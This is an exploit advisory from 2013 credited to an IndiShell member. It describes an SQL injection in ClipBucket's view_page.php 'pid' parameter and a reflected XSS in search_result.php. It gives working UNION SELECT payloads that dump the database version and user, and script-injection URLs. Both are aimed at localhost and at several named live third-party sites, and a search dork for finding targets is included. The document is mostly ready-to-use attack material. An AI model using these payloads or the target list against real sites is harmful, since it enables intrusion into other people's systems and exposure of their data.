# Exploit Title : SQL Injection and XSS vulnerability in ClipBucket script # Date : 01 July 2013 # Exploit Author : 3rr0r1046 IndiShell # Vendor Homepage : http://clip-bucket.com/ # Category : webapps # Tested on : Linux # Dork : "Forged by ClipBucket" //////////////////// DESCRIPTION //////////////////// clipbucket is video and photo hosting cms in which user can upload videos and photos this CMS has SQL injection vulnerability in 'pid' parameter in view_page.php page script through which attacker can gain info from database by executing arbitrary SQL commands . There is XSS flaw also exist in search_result.php in 'query ' parameter ////////////////// POC SQL Injection ////////////////// Dumping SQL version and user http://127.0.0.1/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+ live demo 1.http://insXafpk.tv/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+ 2. http://vid4X8.com/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+ 3. http://koolXspan.com/clip/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10 --+ 4. http://X.agro.uba.ar/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+ //////////////// POC XSS //////////////// sample XSS attack url http://127.0.0.1/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search live demo 1.http://insafpk.tv/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search 2.http://comunicacionenvideos.agro.uba.ar/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search 3. http://vid48.com/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search 4. http://koolspan.com/clip/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search --==[[ Greetz To ]]==-- ########## Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,silent hacker and rest of TEAM INDISHELL ##########